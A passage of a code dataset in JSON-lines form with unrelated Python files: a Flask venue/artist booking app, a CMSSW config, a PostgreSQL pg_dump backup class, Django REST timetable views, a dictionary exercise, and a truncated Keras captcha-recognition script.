{\n 'level': 'DEBUG',\n 'class': 'rq.utils.ColorizingStreamHandler',\n 'formatter': 'main'\n },\n },\n\n 'loggers': {\n 'requests': {\n 'level': 'ERROR',\n },\n 'apscheduler': {\n 'level': 'ERROR',\n },\n 'mon': {\n 'level': level,\n }\n },\n\n 'root': {\n 'handlers': ['main'],\n 'level': 'ERROR',\n }\n\n\n })\n","sub_path":"conf/logutils.py","file_name":"logutils.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"344722515","text":"# ----------------------------------------------------------------------------#\n# Imports\n# ----------------------------------------------------------------------------#\nimport sys\n\nimport babel\nimport dateutil.parser\nfrom flask import Flask, abort, flash, redirect, render_template, request, url_for\nfrom flask_migrate import Migrate\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.dialects.postgresql import JSON\nfrom datetime import datetime\nimport itertools\nimport logging\nfrom logging import FileHandler, Formatter\n\nfrom forms import ArtistForm, VenueForm, ShowForm\nfrom models import db, Venue, Artist, Show\n\n# ----------------------------------------------------------------------------#\n# App init\n# ----------------------------------------------------------------------------#\n\napp = Flask(__name__)\napp.config.from_object(\"config\")\napp.config.from_envvar(\"APPLICATION_SETTINGS\")\nmigrate = Migrate(app, db)\ndb.init_app(app)\n\n\n# ----------------------------------------------------------------------------#\n# Filters.\n# ----------------------------------------------------------------------------#\n\n\ndef format_datetime(value, format=\"medium\"):\n date = dateutil.parser.parse(value)\n if format == \"full\":\n format = \"EEEE MMMM, d, y 'at' h:mma\"\n elif format == \"medium\":\n format = \"EE MM, dd, y h:mma\"\n return babel.dates.format_datetime(date, format)\n\n\napp.jinja_env.filters[\"datetime\"] = format_datetime\n\n# ----------------------------------------------------------------------------#\n# Controllers.\n# ----------------------------------------------------------------------------#\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"pages/home.html\")\n\n\n# Venues\n# ----------------------------------------------------------------\n\n\n@app.route(\"/venues\")\ndef venues():\n\n # get all venues\n venues = Venue.query.all()\n\n keyfunc = lambda v: (v[\"city\"], v[\"state\"])\n sorted_venues = sorted(venues, key=keyfunc)\n grouped_venues = itertools.groupby(sorted_venues, key=keyfunc)\n\n data = [\n {\"city\": key[0], \"state\": key[1], \"venues\": list(data)}\n for key, data in grouped_venues\n ]\n\n return render_template(\"pages/venues.html\", areas=data)\n\n\n@app.route(\"/venues/search\", methods=[\"POST\"])\ndef search_venues():\n # term to search for (eg., 'Superdome')\n search_term = request.form.get(\"search_term\", \"\")\n\n search_results = Venue.query.filter(Venue.name.ilike(f\"%{search_term}%\")).all()\n\n # query the db using ilike\n # response = Venue.query.filter(Venue.name.ilike(search_term)).all()\n venues = [\n {\n \"id\": venue.id,\n \"name\": venue.name,\n # 'num_upcoming_shows': venue.upcoming_shows_count\n }\n for venue in search_results\n ]\n\n response = {\"count\": len(search_results), \"data\": list(venues)}\n\n return render_template(\n \"pages/search_venues.html\",\n results=response,\n search_term=request.form.get(\"search_term\", \"\"),\n )\n\n\n@app.route(\"/venues/\")\ndef show_venue(venue_id):\n\n past_shows = []\n upcoming_shows = []\n past_shows_count = 0\n upcoming_shows_count = 0\n\n # get venue with all shows AND artists\n venue = Venue.query.get(venue_id)\n\n # get current time\n now = datetime.now()\n\n # get upcoming_shows\n for show in venue.show:\n # get artist data\n artist_data = Artist.query.get(show.artist_id)\n if show.start_time > now:\n upcoming_shows_count += 1\n upcoming_shows.append(\n {\n \"artist_id\": show.artist_id,\n \"artist_name\": artist_data.name,\n \"artist_image_link\": artist_data.image_link,\n \"start_time\": show.start_time.isoformat(),\n }\n )\n elif show.start_time < now:\n past_shows_count += 1\n past_shows.append(\n {\n \"artist_id\": show.artist_id,\n \"artist_name\": artist_data.name,\n \"artist_image_link\": artist_data.image_link,\n \"start_time\": show.start_time.isoformat(),\n }\n )\n\n data = {\n \"id\": venue.id,\n \"name\": venue.name,\n \"address\": venue.address,\n \"city\": venue.city,\n \"state\": venue.state,\n \"phone\": venue.phone,\n \"website\": venue.website,\n \"facebook_link\": venue.facebook_link,\n \"seeking_talent\": venue.seeking_talent,\n \"image_link\": venue.image_link,\n \"past_shows\": past_shows,\n \"upcoming_shows\": upcoming_shows,\n \"past_shows_count\": past_shows_count,\n \"upcoming_shows_count\": upcoming_shows_count,\n }\n\n return render_template(\"pages/show_venue.html\", venue=data)\n\n\n# Create Venue\n# ----------------------------------------------------------------\n\n\n@app.route(\"/venues/create\", methods=[\"GET\"])\ndef create_venue_form():\n form = VenueForm()\n return render_template(\"forms/new_venue.html\", form=form)\n\n\n@app.route(\"/venues/create\", methods=[\"POST\"])\ndef create_venue_submission():\n error = False\n\n try:\n data = Venue(\n name=request.form[\"name\"],\n address=request.form[\"address\"],\n city=request.form[\"city\"],\n state=request.form[\"state\"],\n phone=request.form[\"phone\"],\n genres=request.form[\"genres\"],\n website=request.form[\"website\"],\n image_link=request.form[\"image_link\"],\n facebook_link=request.form[\"facebook_link\"],\n seeking_talent=request.form[\"seeking_talent\"],\n seeking_description=request.form[\"seeking_description\"],\n )\n if data.seeking_talent == \"y\":\n data.seeking_talent = True\n else:\n data.seeking_talent = False\n db.session.add(data)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error:\n abort(400)\n flash(\"An error occurred. Venue \" + data.name + \" could not be listed.\")\n else:\n flash(\"Venue \" + request.form[\"name\"] + \" was successfully listed!\")\n\n return render_template(\"pages/home.html\")\n\n\n# delete a show\n@app.route(\"/shows/\", methods=[\"DELETE\"])\ndef delete_show(show_id):\n error = False\n\n show = Show.query.get(show_id)\n\n try:\n db.session.delete(show)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error:\n abort(400)\n flash(\"An error occurred. Show could not be deleted.\")\n else:\n flash(\"Show was successfully deleted!\")\n return redirect(url_for(\"index\"))\n\n\n@app.route(\"/venues/\", methods=[\"DELETE\"])\ndef delete_venue(venue_id):\n error = False\n\n venue = Venue.query.get(venue_id)\n\n try:\n db.session.delete(venue)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error:\n abort(400)\n flash(\"An error occurred. Venue could not be deleted.\")\n else:\n flash(\"Venue was successfully deleted!\")\n return redirect(url_for(\"index\"))\n\n\n# Artists\n# ----------------------------------------------------------------\n@app.route(\"/artists\")\ndef artists():\n # return all artists\n data = Artist.query.all()\n\n return render_template(\"pages/artists.html\", artists=data)\n\n\n@app.route(\"/artists/search\", methods=[\"POST\"])\ndef search_artists():\n # term to search for (eg., 'guns n petals')\n search_term = request.form.get(\"search_term\", \"\")\n\n search_results = Artist.query.filter(Artist.name.ilike(f\"%{search_term}%\")).all()\n\n # query the db using ilike\n # response = Venue.query.filter(Venue.name.ilike(search_term)).all()\n artists = [\n {\n \"id\": artist.id,\n \"name\": artist.name,\n # 'num_upcoming_shows': venue.upcoming_shows_count\n }\n for artist in search_results\n ]\n\n response = {\"count\": len(search_results), \"data\": list(artists)}\n\n return render_template(\n \"pages/search_artists.html\",\n results=response,\n search_term=request.form.get(\"search_term\", \"\"),\n )\n\n\n@app.route(\"/artists/\")\ndef show_artist(artist_id):\n\n past_shows = []\n upcoming_shows = []\n past_shows_count = 0\n upcoming_shows_count = 0\n\n # get venue with all shows AND artists\n artist = Artist.query.get(artist_id)\n\n # get current time\n now = datetime.now()\n\n # get upcoming_shows\n for show in artist.show:\n # get artist data\n venue_data = Venue.query.get(show.venue_id)\n if show.start_time > now:\n upcoming_shows_count += 1\n upcoming_shows.append(\n {\n \"venue_id\": show.venue_id,\n \"venue_name\": venue_data.name,\n \"venue_image_link\": venue_data.image_link,\n \"start_time\": show.start_time.isoformat(),\n }\n )\n elif show.start_time < now:\n past_shows_count += 1\n past_shows.append(\n {\n \"venue_id\": show.artist_id,\n \"venue_name\": venue_data.name,\n \"venue_image_link\": venue_data.image_link,\n \"start_time\": show.start_time.isoformat(),\n }\n )\n\n data = {\n \"id\": artist.id,\n \"name\": artist.name,\n \"genres\": artist.genres,\n \"city\": artist.city,\n \"state\": artist.state,\n \"phone\": artist.phone,\n \"seeking_venue\": artist.seeking_venue,\n \"seeking_description\": artist.seeking_description,\n \"website\": artist.website,\n \"facebook_link\": artist.facebook_link,\n \"image_link\": artist.image_link,\n \"past_shows\": past_shows,\n \"upcoming_shows\": upcoming_shows,\n \"past_shows_count\": past_shows_count,\n \"upcoming_shows_count\": upcoming_shows_count,\n }\n\n return render_template(\"pages/show_artist.html\", artist=data)\n\n\n# Update\n# ----------------------------------------------------------------\n@app.route(\"/artists//edit\", methods=[\"GET\"])\ndef edit_artist(artist_id):\n\n # get artist\n artist = Artist.query.get(artist_id)\n\n data = {\n \"id\": artist.id,\n \"name\": artist.name,\n \"genres\": artist.genres,\n \"city\": artist.city,\n \"state\": artist.state,\n \"phone\": artist.phone,\n \"website\": artist.website,\n \"facebook_link\": artist.facebook_link,\n \"seeking_venue\": artist.seeking_venue,\n \"seeking_description\": artist.seeking_description,\n \"image_link\": artist.image_link,\n }\n\n form = ArtistForm(data=data)\n\n return render_template(\"forms/edit_artist.html\", form=form, artist=artist)\n\n\n@app.route(\"/artists//edit\", methods=[\"POST\"])\ndef edit_artist_submission(artist_id):\n # check to make sure the artist exists\n # then update the artist by artist_id\n # error = False\n\n artist = Artist.query.get(artist_id)\n\n # get form\n form = ArtistForm(request.form)\n\n # check if artist exists\n # if artist is None:\n # abort(404)\n # flash(\"artist was not found\")\n\n # validation + request type\n # populate artist w populate_obj\n form.populate_obj(artist)\n db.session.add(artist)\n db.session.commit()\n flash(\"Artist \" + request.form[\"name\"] + \" was successfully updated!\")\n\n return redirect(url_for(\"show_artist\", artist_id=artist_id))\n\n # # try to update the record in db\n # try:\n # db.session.add(artist)\n # db.session.commit()\n # except:\n # error = True\n # db.session.rollback()\n # print(sys.exc_info())\n # finally:\n # db.session.close()\n # if error:\n # abort(400)\n # flash(\"An error occurred. Artist \" + artist.name + \" could not be updated.\")\n # else:\n # flash(\"Artist \" + request.form[\"name\"] + \" was successfully updated!\")\n\n\n@app.route(\"/venues//edit\", methods=[\"GET\"])\ndef edit_venue(venue_id):\n\n venue = Venue.query.get(venue_id)\n\n data = {\n \"id\": venue.id,\n \"name\": venue.name,\n \"genres\": venue.genres,\n \"city\": venue.city,\n \"state\": venue.state,\n \"address\": venue.address,\n \"phone\": venue.phone,\n \"image_link\": venue.image_link,\n \"website\": venue.website,\n \"facebook_link\": venue.facebook_link,\n \"seeking_talent\": venue.seeking_talent,\n \"seeking_description\": venue.seeking_description,\n }\n\n form = VenueForm(data=data)\n\n return render_template(\"forms/edit_venue.html\", form=form, venue=venue)\n\n\n@app.route(\"/venues//edit\", methods=[\"POST\"])\ndef edit_venue_submission(venue_id):\n\n venue = Venue.query.get(venue_id)\n\n form = VenueForm(request.form) # maybe need obj=venue param?\n\n form.populate_obj(venue)\n\n db.session.add(venue)\n db.session.commit()\n flash(\"Venue \" + request.form[\"name\"] + \" was successfully updated!\")\n return redirect(url_for(\"show_venue\", venue_id=venue_id))\n\n\n# Create Artist\n# ----------------------------------------------------------------\n\n\n@app.route(\"/artists/create\", methods=[\"GET\"])\ndef create_artist_form():\n form = ArtistForm()\n return render_template(\"forms/new_artist.html\", form=form)\n\n\n@app.route(\"/artists/create\", methods=[\"POST\"])\ndef create_artist_submission():\n # called upon submitting the new artist listing form\n # on successful db insert, flash success\n error = False\n try:\n data = Artist(\n name=request.form[\"name\"],\n phone=request.form[\"phone\"],\n city=request.form[\"city\"],\n state=request.form[\"state\"],\n genres=request.form[\"genres\"],\n image_link=request.form[\"image_link\"],\n facebook_link=request.form[\"facebook_link\"],\n website=request.form[\"website\"],\n seeking_venue=request.form[\"seeking_venue\"],\n seeking_description=request.form[\"seeking_description\"],\n )\n if data.seeking_venue == \"y\":\n data.seeking_venue = True\n else:\n data.seeking_venue = False\n db.session.add(data)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error:\n abort(400)\n flash(\"An error occurred. Artist \" + data.name + \" could not be listed.\")\n else:\n flash(\"Artist \" + request.form[\"name\"] + \" was successfully listed!\")\n\n return render_template(\"pages/home.html\")\n\n\n# Shows\n# ----------------------------------------------------------------\n\n\n@app.route(\"/shows\")\ndef shows():\n\n # get all shows\n shows = Show.query.all()\n\n data = []\n\n # for each show, get venue and artist data\n for show in shows:\n\n # get artist data\n artist = Artist.query.get(show.artist_id)\n\n # get venue data\n venue = Venue.query.get(show.venue_id)\n\n data.append(\n {\n \"venue_id\": show.venue_id,\n \"venue_name\": venue.name,\n \"artist_id\": show.artist_id,\n \"artist_name\": artist.name,\n \"artist_image_link\": artist.image_link,\n \"start_time\": show.start_time.isoformat(),\n }\n )\n\n return render_template(\"pages/shows.html\", shows=data)\n\n\n@app.route(\"/shows/create\")\ndef create_shows():\n form = ShowForm()\n return render_template(\"forms/new_show.html\", form=form)\n\n\n@app.route(\"/shows/create\", methods=[\"POST\"])\ndef create_show_submission():\n error = False\n\n try:\n data = Show(\n venue_id=request.form[\"venue_id\"],\n artist_id=request.form[\"artist_id\"],\n start_time=request.form[\"start_time\"],\n )\n db.session.add(data)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error:\n abort(400)\n flash(\"An error occurred. Show could not be created.\")\n else:\n flash(\"Show was successfully created!\")\n\n return render_template(\"pages/home.html\")\n\n\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template(\"errors/404.html\"), 404\n\n\n@app.errorhandler(500)\ndef server_error(error):\n return render_template(\"errors/500.html\"), 500\n\n\nif not app.debug:\n file_handler = FileHandler(\"error.log\")\n file_handler.setFormatter(\n Formatter(\"%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]\")\n )\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info(\"errors\")\n\n# ----------------------------------------------------------------------------#\n# Launch.\n# ----------------------------------------------------------------------------#\n\n# Default port:\nif __name__ == \"__main__\":\n app.run()\n\n# Or specify port manually:\n\"\"\"\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n\"\"\"\n","sub_path":"projects/01_fyyur/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":17416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"575884296","text":"# Run CSCIndexerAnalyzer2 - ptc - 20.11.2012\n\nimport FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"TEST\")\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(1) )\nprocess.source = cms.Source(\"EmptySource\")\n\nprocess.load(\"Configuration.Geometry.GeometryExtended_cff\")\nprocess.load(\"Configuration.StandardSequences.FrontierConditions_GlobalTag_cff\")\nprocess.load(\"Geometry.CommonTopologies.globalTrackingGeometry_cfi\")\nprocess.load(\"Geometry.MuonNumbering.muonNumberingInitialization_cfi\")\n\nprocess.GlobalTag.globaltag = \"MC_61_V2::All\"\nprocess.load(\"Alignment.CommonAlignmentProducer.FakeAlignmentSource_cfi\")\nprocess.preferFakeAlign = cms.ESPrefer(\"FakeAlignmentSource\")\n\nprocess.load(\"CondCore.DBCommon.CondDBCommon_cfi\")\n\nprocess.dummy = cms.ESSource(\"EmptyESSource\",\n recordName = cms.string(\"CSCIndexerRecord\"),\n firstValid = cms.vuint32(1),\n iovIsRunNotTime = cms.bool(True)\n)\n\n##process.load(\"CalibMuon.CSCCalibration.CSCIndexer_cfi\")\n## The above cfi gives rise to the following line:\n\n##process.CSCIndexerESProducer = cms.ESProducer(\"CSCIndexerESProducer\", AlgoName = cms.string(\"CSCIndexerStartup\") )\nprocess.CSCIndexerESProducer = cms.ESProducer(\"CSCIndexerESProducer\", AlgoName = cms.string(\"CSCIndexerPostls1\") )\n\nprocess.analyze = cms.EDAnalyzer(\"CSCIndexerAnalyzer2\")\n\nprocess.test = cms.Path(process.analyze)\n\n","sub_path":"CalibMuon/CSCCalibration/test/runCSCIndexerAnalyzer2_UPG_cfg.py","file_name":"runCSCIndexerAnalyzer2_UPG_cfg.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"577458363","text":"import subprocess\nimport os\n\nfrom .base import BaseDump\n\n\nclass PostgreSQLDump(BaseDump):\n\n def dump(self, config, s3_bucket, s3_bucket_key_name, filepath,\n verbose=False, upload_callback=None):\n sqldump_cmd = [\n 'pg_dump',\n '-d', config['NAME'],\n '-h', config['HOST'],\n '-p', config['PORT'],\n '-U', config['USER']\n ]\n\n process = subprocess.Popen(\n sqldump_cmd, stdout=subprocess.PIPE,\n env=dict(os.environ, PGPASSWORD=config['PASSWORD'])\n )\n\n if verbose:\n print('Dumping PostgreSQL database: {database} to file {filepath}'.format(\n database=config['NAME'], filepath=filepath))\n\n with open(filepath, 'w+') as f:\n while True:\n buf = process.stdout.read(4096 * 1024) # Read 4 MB\n if buf:\n f.write(buf.decode(\"utf-8\"))\n if verbose:\n print('- Written 4 MB')\n else:\n break\n\n if verbose:\n print('+ Dump finished')\n\n if upload_callback is not None:\n upload_callback(f, s3_bucket, s3_bucket_key_name, verbose)\n","sub_path":"db_s3_backup/db_interface/postgresql.py","file_name":"postgresql.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"652687372","text":"from django.core.exceptions import FieldError, ObjectDoesNotExist\nfrom django.utils import timezone\nfrom rest_framework import generics\nfrom rest_framework.exceptions import ParseError\nfrom rest_framework.permissions import IsAuthenticated, IsAdminUser, AllowAny\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_201_CREATED\n\nfrom .permissions import IsStudentOrReadOnly, IsOtherStudent, IsStudent, IsTheStudent\nfrom .serializers import StudentSerializer, CollegeSerializer, DepartmentSerializer, MajorSerializer, \\\n CourseSerializer, LectureSerializer, EvaluationSerializer, EvaluationDetailSerializer, MyTimeTableSerializer, \\\n BookmarkedTimeTableSerializer, ReceivedTimeTableSerializer, SendTimeTableSerializer, CopyTimeTableSerializer, \\\n TimeTableSerializer\nfrom .models import Student, College, Department, Major, Course, Lecture, Evaluation, MyTimeTable, BookmarkedTimeTable, \\\n ReceivedTimeTable, TimeTable\n\nfrom .recommend import recommend\n\n\nclass FilterAPIView(generics.GenericAPIView):\n \"\"\"\n Custom supporting APIView for filtering queryset based on query_params.\n\n By extending this class, the APIView will automatically filter queryset if the request\n has query_params.\n Keys of the query_params MUST be a valid key of the function 'QuerySet.filter', or\n raises ParseError with status 400.\n \"\"\"\n\n def filter_queryset(self, queryset):\n errors = {}\n for key, value in self.request.query_params.items():\n try:\n queryset.filter(**{key: value})\n except (FieldError, ValueError) as e:\n error_key = '{}={}'.format(key, value)\n error_value = list(e.args)\n errors[error_key] = error_value\n if errors:\n raise ParseError(errors)\n return queryset.filter(**self.request.query_params.dict())\n\n\nclass StudentList(generics.ListAPIView):\n queryset = Student.objects.all()\n serializer_class = StudentSerializer\n permission_classes = (IsAdminUser,)\n\n\nclass StudentCreate(generics.CreateAPIView):\n queryset = Student.objects.all()\n serializer_class = StudentSerializer\n permission_classes = (AllowAny,)\n\n\nclass StudentDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = Student.objects.all()\n serializer_class = StudentSerializer\n permission_classes = (IsAuthenticated, IsStudent)\n\n def get_object(self):\n return Student.objects.get_by_natural_key(self.request.user.username)\n\n\nclass CourseList(FilterAPIView, generics.ListAPIView):\n queryset = Course.objects.all()\n serializer_class = CourseSerializer\n permission_classes = (IsAuthenticated,)\n\n\nclass CourseDetail(generics.RetrieveAPIView):\n queryset = Course.objects.all()\n serializer_class = CourseSerializer\n permission_classes = (IsAuthenticated,)\n\n\nclass LectureList(FilterAPIView, generics.ListAPIView):\n queryset = Lecture.objects.all()\n serializer_class = LectureSerializer\n permission_classes = (IsAuthenticated,)\n\n\nclass LectureDetail(generics.RetrieveAPIView):\n queryset = Lecture.objects.all()\n serializer_class = LectureSerializer\n permission_classes = (IsAuthenticated,)\n\n\nclass EvaluationList(FilterAPIView, generics.ListCreateAPIView):\n queryset = Evaluation.objects.all()\n serializer_class = EvaluationSerializer\n permission_classes = (IsAuthenticated, IsStudentOrReadOnly)\n\n def perform_create(self, serializer):\n serializer.save(author=Student.objects.get_by_natural_key(self.request.user.username))\n\n\nclass EvaluationDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = Evaluation.objects.all()\n serializer_class = EvaluationDetailSerializer\n permission_classes = (IsAuthenticated, IsTheStudent)\n\n\nclass EvaluationLikeIt(generics.RetrieveDestroyAPIView):\n queryset = Evaluation.objects.all()\n serializer_class = EvaluationDetailSerializer\n permission_classes = (IsAuthenticated, IsOtherStudent)\n\n def retrieve(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.like_it.add(Student.objects.get_by_natural_key(request.user.username))\n instance.save()\n serializer = self.get_serializer(instance)\n return Response(serializer.data)\n\n def destroy(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.like_it.remove(Student.objects.get_by_natural_key(request.user.username))\n instance.save()\n serializer = self.get_serializer(instance)\n return Response(serializer.data)\n\n\nclass MyTimeTableList(FilterAPIView, generics.ListCreateAPIView):\n \"\"\"\n If the student have a TimeTable with given year and semester already,\n the existing TimeTable will be overwritten by new TimeTable.\n \"\"\"\n serializer_class = MyTimeTableSerializer\n permission_classes = (IsAuthenticated, IsStudent)\n\n def get_queryset(self):\n return MyTimeTable.objects.filter(owner__username=self.request.user.username)\n\n def perform_create(self, serializer):\n owner = Student.objects.get_by_natural_key(self.request.user.username)\n try:\n old_time_table = MyTimeTable.objects.get(year=serializer.year, semester=serializer.semester, owner=owner)\n old_time_table.delete()\n except ObjectDoesNotExist:\n pass\n serializer.save(owner=owner)\n\n\nclass MyTimeTableDetail(generics.RetrieveUpdateDestroyAPIView):\n serializer_class = MyTimeTableSerializer\n permission_classes = (IsAuthenticated, IsStudent)\n\n def get_queryset(self):\n return MyTimeTable.objects.filter(owner__username=self.request.user.username)\n\n\nclass BookmarkedTimeTableList(FilterAPIView, generics.ListCreateAPIView):\n serializer_class = BookmarkedTimeTableSerializer\n permission_classes = (IsAuthenticated, IsStudent)\n\n def get_queryset(self):\n return BookmarkedTimeTable.objects.filter(owner__username=self.request.user.username)\n\n def perform_create(self, serializer):\n serializer.save(owner=Student.objects.get_by_natural_key(self.request.user.username))\n\n\nclass BookmarkedTimeTableDetail(generics.RetrieveUpdateDestroyAPIView):\n serializer_class = BookmarkedTimeTableSerializer\n permission_classes = (IsAuthenticated, IsStudent)\n\n def get_queryset(self):\n return BookmarkedTimeTable.objects.filter(owner__username=self.request.user.username)\n\n\nclass ReceivedTimeTableList(FilterAPIView, generics.ListAPIView):\n serializer_class = ReceivedTimeTableSerializer\n permission_classes = (IsAuthenticated, IsStudent)\n\n def get_queryset(self):\n return ReceivedTimeTable.objects.filter(owner__username=self.request.user.username)\n\n\nclass ReceivedTimeTableDetail(generics.RetrieveDestroyAPIView):\n serializer_class = ReceivedTimeTableSerializer\n permission_classes = (IsAuthenticated, IsStudent)\n\n def get_queryset(self):\n return ReceivedTimeTable.objects.filter(owner__username=self.request.user.username)\n\n\nclass ReceiveTimeTable(generics.RetrieveAPIView):\n \"\"\"\n Perform receiving the TimeTable.\n \"\"\"\n serializer_class = ReceivedTimeTableSerializer\n permission_classes = (IsAuthenticated, IsStudent)\n\n def get_queryset(self):\n return ReceivedTimeTable.objects.filter(owner__username=self.request.user.username)\n\n def retrieve(self, request, *args, **kwargs):\n time_table = self.get_object()\n if time_table.received_at is None:\n time_table.received_at = timezone.now()\n time_table.save()\n serializer = self.get_serializer(time_table)\n return Response(serializer.data)\n\n\nclass CopyTimeTable(generics.CreateAPIView):\n \"\"\"\n Base APIView for copying or overwriting TimeTable.\n \"\"\"\n permission_classes = (IsAuthenticated, IsStudent)\n serializer_class = CopyTimeTableSerializer\n\n def get_serializer(self, *args, **kwargs):\n serializer_class = self.get_serializer_class()\n kwargs['context'] = self.get_serializer_context()\n return serializer_class(*args, **kwargs, owner=Student.objects.get_by_natural_key(self.request.user.username))\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n new_time_table_id = self.perform_create(serializer)\n return Response({\"created_time_table\": new_time_table_id}, status=HTTP_201_CREATED)\n\n\nclass CopyToMyTimeTable(CopyTimeTable):\n def perform_create(self, serializer):\n time_table = TimeTable.objects.get(pk=serializer.data['time_table_id'])\n owner = Student.objects.get_by_natural_key(serializer.owner)\n try:\n old_time_table = MyTimeTable.objects.get(year=time_table.year, semester=time_table.semester, owner=owner)\n old_time_table.delete()\n except ObjectDoesNotExist:\n pass\n new_time_table = MyTimeTable(other=time_table, owner=owner)\n new_time_table.save_m2m()\n return new_time_table.id\n\n\nclass BookmarkTimeTable(CopyTimeTable):\n def perform_create(self, serializer):\n time_table = TimeTable.objects.get(pk=serializer.data['time_table_id'])\n owner = Student.objects.get_by_natural_key(serializer.owner)\n new_time_table = BookmarkedTimeTable(other=time_table, owner=owner)\n new_time_table.save_m2m()\n return new_time_table.id\n\n\nclass SendTimeTable(CopyTimeTable):\n serializer_class = SendTimeTableSerializer\n\n def perform_create(self, serializer):\n time_table = TimeTable.objects.get(pk=serializer.data['time_table_id'])\n owner = Student.objects.get_by_natural_key(serializer.data['receiver_name'])\n sender = Student.objects.get_by_natural_key(serializer.owner)\n new_time_table = ReceivedTimeTable(other=time_table, owner=owner, sender=sender)\n new_time_table.save_m2m()\n return new_time_table.id\n\n\nclass CollegeList(FilterAPIView, generics.ListAPIView):\n queryset = College.objects.all()\n serializer_class = CollegeSerializer\n permission_classes = (AllowAny,)\n\n\nclass DepartmentList(FilterAPIView, generics.ListAPIView):\n queryset = Department.objects.all()\n serializer_class = DepartmentSerializer\n permission_classes = (AllowAny,)\n\n\nclass MajorList(FilterAPIView, generics.ListAPIView):\n queryset = Major.objects.all()\n serializer_class = MajorSerializer\n permission_classes = (AllowAny,)\n\n\nclass RecommendView(generics.ListAPIView):\n serializer_class = TimeTableSerializer\n permission_classes = (IsAuthenticated, IsStudent)\n\n def get_queryset(self):\n options = self.request.query_params.copy()\n student = Student.objects.get_by_natural_key(self.request.user.username)\n return recommend(options, student)\n","sub_path":"backend/ttrs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"288725853","text":"datos_basicos = {\n \"nombres\":\"Leonardo Jose\",\n \"apellidos\":\"Caballero Garcia\",\n \"cedula\":\"26938401\",\n \"fecha_nacimiento\":\"03/12/1980\",\n \"lugar_nacimiento\":\"Maracaibo, Zulia, Venezuela\",\n \"nacionalidad\":\"Venezolana\",\n \"estado_civil\":\"Soltero\"\n}\nclave = datos_basicos.keys()\nvalor = datos_basicos.values()\n\ncantidad_datos = datos_basicos.items()\n\nfor clave, valor in cantidad_datos:\n print(clave + \": \" + valor)","sub_path":"Unidad 3/diccionariosConFor.py","file_name":"diccionariosConFor.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"159686096","text":"from captcha.image import ImageCaptcha\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport string\nfrom keras import backend as K\nfrom keras.models import *\nfrom keras.layers import *\nimport keras\n#\n# 補充\n# generate_image(chars) 生成驗證碼的核心方法,生成chars內容的驗證碼圖片的Image對象。\n# create_captcha_image(chars, color, background) generate_image的實現方法,可以通過重寫此方法來實現自定義驗證碼樣式。\n# create_noise_dots(image, color, width=3, number=30) 生成驗證碼干擾點。\n# create_noise_curve(image, color) 生成驗證碼干擾曲線。\n#\n\n# captcha 是驗證碼的意思!\n# 驗證碼包含0-10數字以及26個英文字母\ncharacters = string.digits + string.ascii_uppercase\nprint(characters)\n# 設定產生圖片尺寸,以及總類別,n_class之所以要加一是為了留一個位置給Blank\nwidth, height, n_len, n_class = 170, 80, 4, len(characters)+1\n#\n# 設定產生驗證碼的generator\n# ImageCaptcha(width=160, height=60, fonts=None, font_sizes=None) 類實例化時,還可傳入四個參數:\n# width: 生成驗證碼圖片的寬度,默認為160個像素;\n# height: 生成驗證碼圖片的高度,默認為60個像素;\n# fonts:字體文件路徑,用於生成驗證碼時的字體,默認使用模塊自帶DroidSansMono.ttf字體,\n# 你可以將字體文件放入list或者tuple傳入,生成驗證碼時將隨機使用;\n# font_sizes:控制驗證碼字體大小,同fonts一樣,接收一個list或者tuple,隨機使用。\n#\ngenerator = ImageCaptcha(width=width, height=height, fonts=None, font_sizes=None)\nprint(generator)\n# 我們先練習固定長度4個字的驗證碼\nrandom_str = ''.join([random.choice(characters) for j in range(4)])\nimg = generator.generate_image(random_str)\nplt.imshow(img)\nplt.title(random_str)\nplt.show()\n# ---------------------------------------------------------------------------------------\n\nrnn_size = 128\ninput_tensor = Input((height,width, 3))\nx = input_tensor\n\nfor i in range(4):\n x = Convolution2D(32, 3, 3, activation='relu')(x)\n x = keras.layers.BatchNormalization(axis=-1)(x)\n x = Convolution2D(32, 3, 3, activation='relu')(x)\n x = keras.layers.BatchNormalization(axis=-1)(x)\n if i < 3:\n x = MaxPooling2D(pool_size=(2, 2))(x)\n else:\n x = MaxPooling2D(pool_size=(2, 